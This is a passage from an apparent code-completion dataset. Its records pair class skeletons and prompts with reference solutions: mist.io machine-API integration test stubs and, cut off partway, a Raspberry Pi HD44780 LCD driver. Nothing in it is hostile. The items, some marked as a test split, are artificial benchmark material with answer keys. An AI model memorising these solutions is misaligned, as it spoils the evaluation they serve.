\"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_0|>\n\n<|body_start_1|>\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n 
print('Success!!!')\n<|end_body_1|>\n\n<|body_start_2|>\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_2|>\n\n<|body_start_3|>\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_3|>\n\n<|body_start_4|>\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_4|>\n", "class_docstring": "MachinesController integration test stubs", "class_name": "TestMachinesController1", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n <|body_0|>\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n <|body_1|>\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n <|body_2|>\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n <|body_3|>\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : 
\"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_0|>\n\n<|body_start_1|>\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_1|>\n\n<|body_start_2|>\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_2|>\n\n<|body_start_3|>\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_3|>\n\n<|body_start_4|>\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + 
'/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000378", "length_bytes": 7528, "license_type": "no_license", "methods": [{"docstring": "Test case for create_machine Create machine", "name": "test_create_machine", "signature": "def test_create_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for reboot_machine Reboot machine", "name": "test_reboot_machine", "signature": "def test_reboot_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for resize_machine Resize machine", "name": "test_resize_machine", "signature": "def test_resize_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for start_machine Start machine", "name": "test_start_machine", "signature": "def test_start_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for stop_machine Stop machine", "name": "test_stop_machine", "signature": "def test_stop_machine(self, pretty_print, owner_api_token)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002093", "prompt": "Implement the Python class `TestMachinesController1` described below.\n\nClass description:\nMachinesController integration test stubs\n\nMethod signatures and docstrings:\n- def test_create_machine(self, pretty_print, owner_api_token): Test case for create_machine Create machine\n- def test_reboot_machine(self, pretty_print, owner_api_token): Test case for reboot_machine Reboot machine\n- def test_resize_machine(self, pretty_print, owner_api_token): Test case for resize_machine Resize machine\n- def test_start_machine(self, pretty_print, owner_api_token): Test case for start_machine Start machine\n- def test_stop_machine(self, pretty_print, owner_api_token): Test case for stop_machine Stop machine", "prompted_full_text": "Implement the Python class `TestMachinesController1` described below.\n\nClass description:\nMachinesController integration test stubs\n\nMethod signatures and docstrings:\n- def test_create_machine(self, pretty_print, owner_api_token): Test case for create_machine Create machine\n- def test_reboot_machine(self, pretty_print, owner_api_token): Test case for reboot_machine Reboot machine\n- def test_resize_machine(self, pretty_print, owner_api_token): Test case for resize_machine Resize machine\n- def test_start_machine(self, pretty_print, owner_api_token): Test case for start_machine Start machine\n- def test_stop_machine(self, pretty_print, owner_api_token): Test case for stop_machine Stop machine\n\n<|skeleton|>\nclass TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n <|body_0|>\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n <|body_1|>\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n <|body_2|>\n\n def 
test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n <|body_3|>\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_0|>\n\n<|body_start_1|>\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_1|>\n\n<|body_start_2|>\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_2|>\n\n<|body_start_3|>\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n 
request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_3|>\n\n<|body_start_4|>\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_4|>\n", "revision_id": "28a4e128f7de3988452d7a8398438dd22a7113ed", "skeleton": "<|skeleton|>\nclass TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n <|body_0|>\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n <|body_1|>\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n <|body_2|>\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n <|body_3|>\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n 
assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n", "source": "the_stack_v2_python_sparse", "source_path": 
"misttests/integration/api/main/v2/test_machines_controller_1.py", "source_repo": "mistio/mist.tests", "split": "test", "star_events_count": 1} {"blob_id": "a982cbd211dae5a7d528a9748bebafcaeaa9e6a1", "bodies": ["self.debug = debug\nself.rs_pin = rs_pin\nself.en_pin = en_pin\nself.pins = pins\nGPIO.setmode(GPIO.BCM)\nif not self.debug:\n GPIO.setwarnings(False)\nGPIO.setup(self.en_pin, GPIO.OUT)\nGPIO.setup(self.rs_pin, GPIO.OUT)\nfor pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\nHD44780.__init__(self, debug=self.debug, **kwargs)", "if self.debug and (not char_mode):\n print(hex(byte))\nself.write4bits(byte >> 4, char_mode)\nself.write4bits(byte & 15, char_mode)", "bits = bin(bits)[2:][-4:].zfill(4)\nGPIO.output(self.rs_pin, char_mode)\nfor index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\nGPIO.output(self.en_pin, False)\ndelayMicroseconds(1)\nGPIO.output(self.en_pin, True)\ndelayMicroseconds(1)\nGPIO.output(self.en_pin, False)\ndelayMicroseconds(1)"], "bodies_text": "<|body_start_0|>\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n<|end_body_1|>\n\n<|body_start_2|>\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n<|end_body_2|>\n", "class_docstring": "Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.", "class_name": "Screen", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n <|body_0|>\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n <|body_1|>\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. 
If ``char_mode`` is set, holds the RS line high.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n<|end_body_1|>\n\n<|body_start_2|>\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000379", "length_bytes": 3397, "license_type": "permissive", "methods": [{"docstring": "Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor", "name": "__init__", "signature": "def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs)"}, {"docstring": "Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.", "name": "write_byte", "signature": "def write_byte(self, byte, char_mode=False)"}, {"docstring": "Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.", "name": "write4bits", "signature": "def write4bits(self, bits, char_mode=False)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005381", "prompt": "Implement the Python class `Screen` described below.\n\nClass description:\nDriver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\n\nMethod signatures and docstrings:\n- def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs): Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\n- def write_byte(self, byte, char_mode=False): Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\n- def write4bits(self, bits, char_mode=False): Writes a nibble to the display. 
If ``char_mode`` is set, holds the RS line high.", "prompted_full_text": "Implement the Python class `Screen` described below.\n\nClass description:\nDriver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\n\nMethod signatures and docstrings:\n- def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs): Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\n- def write_byte(self, byte, char_mode=False): Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\n- def write4bits(self, bits, char_mode=False): Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\n\n<|skeleton|>\nclass Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n <|body_0|>\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n <|body_1|>\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\"\"\"\n 